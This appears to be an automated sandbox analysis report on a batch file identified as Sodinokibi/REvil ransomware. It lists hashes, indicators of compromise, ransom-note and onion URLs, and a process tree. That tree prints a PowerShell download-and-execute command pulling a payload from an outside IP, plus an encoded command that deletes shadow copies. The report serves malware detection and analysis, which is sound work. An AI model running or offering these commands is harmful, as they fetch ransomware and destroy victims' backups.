Analysis
-
max time kernel
136s -
max time network
53s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
30-04-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
zshXy28d.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
zshXy28d.bat
Resource
win10v200430
General
-
Target
zshXy28d.bat
-
Size
195B
-
MD5
57762b2ecee6c147a6514c848571ffb4
-
SHA1
7e6a6f28a582d92bc3fc1827e7dfa4d78c587706
-
SHA256
a65c6e92ad4af6812ad2515353817627e6a22eeacec2e915c94eac829bba1a54
-
SHA512
f5b1a7faee05e3bce6ebeb259f48ce37d867632c622a13032af281b575b8efc7bd9fb507624fc33ef6ecccbf34482935f1e7ffb484d8fa698bf1c459ae097788
Malware Config
Extracted
http://185.103.242.78/pastes/zshXy28d
Extracted
C:\458sv775hy-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/90634376BBF9ECB9
http://decryptor.cc/90634376BBF9ECB9
Signatures
-
Drops file in Program Files directory 34 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\GetEnable.temp powershell.exe File opened for modification \??\c:\program files\LimitUninstall.vbs powershell.exe File opened for modification \??\c:\program files\UnblockLock.xlt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\458sv775hy-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertRequest.midi powershell.exe File opened for modification \??\c:\program files\RevokePop.3gpp powershell.exe File opened for modification \??\c:\program files\SaveConvertFrom.au3 powershell.exe File opened for modification \??\c:\program files\SendMount.xls powershell.exe File opened for modification \??\c:\program files\ShowConvertTo.zip powershell.exe File opened for modification \??\c:\program files\UnprotectUnblock.vssx powershell.exe File opened for modification \??\c:\program files\ApprovePublish.mpeg3 powershell.exe File opened for modification \??\c:\program files\PublishTest.shtml powershell.exe File opened for modification \??\c:\program files\AddUpdate.wav powershell.exe File opened for modification \??\c:\program files\InitializeInvoke.wvx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\458sv775hy-readme.txt powershell.exe File opened for modification \??\c:\program files\ResolveDisconnect.js powershell.exe File opened for modification \??\c:\program files\ResumeProtect.doc powershell.exe File opened for modification \??\c:\program files\DebugRename.xps powershell.exe File created \??\c:\program files (x86)\458sv775hy-readme.txt powershell.exe File opened for modification \??\c:\program files\ExportProtect.ppsm powershell.exe File opened for modification \??\c:\program files\NewAdd.vsdx powershell.exe File opened for modification \??\c:\program files\PingComplete.xlsb powershell.exe File opened for modification \??\c:\program files\UpdateEnter.rle powershell.exe File created \??\c:\program files\458sv775hy-readme.txt powershell.exe File opened for modification \??\c:\program files\StepShow.ppt powershell.exe File opened for modification \??\c:\program files\ConvertFromJoin.doc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\458sv775hy-readme.txt powershell.exe File opened for modification \??\c:\program files\OptimizeStart.mid powershell.exe File opened for modification \??\c:\program files\RenameSwitch.ram powershell.exe File opened for modification \??\c:\program files\RestoreGroup.raw powershell.exe File opened for modification \??\c:\program files\RevokeShow.clr powershell.exe File opened for modification \??\c:\program files\StartPublish.dotm powershell.exe File opened for modification \??\c:\program files\TracePublish.gif powershell.exe File opened for modification \??\c:\program files\ConnectLimit.wma powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 364 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 364 powershell.exe 364 powershell.exe 364 powershell.exe 1784 powershell.exe 1784 powershell.exe -
Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 2 http://185.103.242.78/pastes/zshXy28d -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1032 wrote to memory of 364 1032 cmd.exe powershell.exe PID 364 wrote to memory of 1784 364 powershell.exe powershell.exe PID 364 wrote to memory of 1784 364 powershell.exe powershell.exe PID 364 wrote to memory of 1784 364 powershell.exe powershell.exe PID 364 wrote to memory of 1784 364 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 1784 powershell.exe Token: SeBackupPrivilege 1612 vssvc.exe Token: SeRestorePrivilege 1612 vssvc.exe Token: SeAuditPrivilege 1612 vssvc.exe Token: SeTakeOwnershipPrivilege 364 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 364 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\c281z2253.bmp" powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\zshXy28d.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/zshXy28d');Invoke-COSENPIUZBZK;Start-Sleep -s 10000"2⤵
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
PID:364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1612